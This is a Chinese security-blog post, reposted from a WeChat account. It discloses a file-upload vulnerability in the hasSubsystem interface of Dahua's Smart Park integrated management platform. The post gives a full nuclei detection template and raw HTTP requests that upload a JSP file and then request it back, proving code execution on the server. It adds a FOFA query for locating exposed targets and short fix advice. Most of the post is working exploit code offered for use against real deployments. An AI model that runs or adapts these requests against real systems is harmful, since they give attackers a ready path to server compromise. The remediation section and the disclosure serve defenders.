大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【附nuclei-POC】

admin
admin
admin
138858
文章
114
评论
2024年11月21日11:23:40评论27 views字数 2075阅读6分55秒阅读模式

漏洞描述:

大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏。攻击者可通过上传包含恶意代码的文件到服务器,使恶意文件被执行,从而导致系统被入侵或遭受其他安全风险。

01

Nuclei POC

id: dahua-zhihuiyuanqu-hasSubsystem-fileuploadinfo:  name: 大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞  author: kingkong  severity: high  metadata:    fofa-query: app="dahua-智慧园区综合管理平台"http:  - raw:      - |        POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1        Host: {{Hostname}}        Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT        User-Agent: Java/1.8.0_345        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2        Content-Length: 229        Connection: close        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT        Content-Disposition: form-data; name="upload"; filename="1.jsp"        Content-Type: application/octet-stream        Content-Transfer-Encoding: binary        <%out.println("test");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>        --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--      - |        GET /upload/emap/society_new/{{data_url}} HTTP/1.1        Host: {{Hostname}}    matchers-condition: and    matchers:      - type: dsl        dsl:              - 'status_code_1 == 200'              - 'status_code_2 == 200'              - 'contains(body_1,"data")'              - 'contains(body_2,"test")'        condition: and    extractors:      - type: regex        name: data_url        part: body_1        group: 1        regex:          - (ico_res_[a-zA-Z0-9]{12}_on.jsp)        internal: true
02

搜索语法

FOFA:app="dahua-智慧园区综合管理平台"

大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【附nuclei-POC】

界面如下

大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【附nuclei-POC】

03

漏洞复现

大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【附nuclei-POC】

访问验证

大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【附nuclei-POC】

漏洞检测POC

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1Host: User-Agent: Java/1.8.0_345Content-Length: 317Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDTAccept-Encoding: gzip--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDTContent-Disposition: form-data; name="upload"; filename="1.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary<%out.println("test");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--GET /upload/emap/society_new/ico_res_dca73685d934_on.jsp HTTP/1.1Host:

neclei批量检测截图

大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【附nuclei-POC】

04

修复建议

1、文件类型验证:仅允许上传特定类型的文件,例如图像、文档等,并拒绝可执行文件或其他潜在的恶意文件类型。

2、文件大小限制:限制上传文件的大小,以防止恶意用户上传过大的文件导致服务器资源耗尽。

3、文件名处理:对上传的文件进行重命名,避免使用用户提供的文件名,以防止路径遍历攻击。

 

原文始发于微信公众号(脚本小子):大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【漏洞复现|附nuclei-POC】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月21日11:23:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华智慧园区综合管理平台hasSubsystem接口处存在文件上传漏洞【附nuclei-POC】https://cn-sec.com/archives/3404126.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息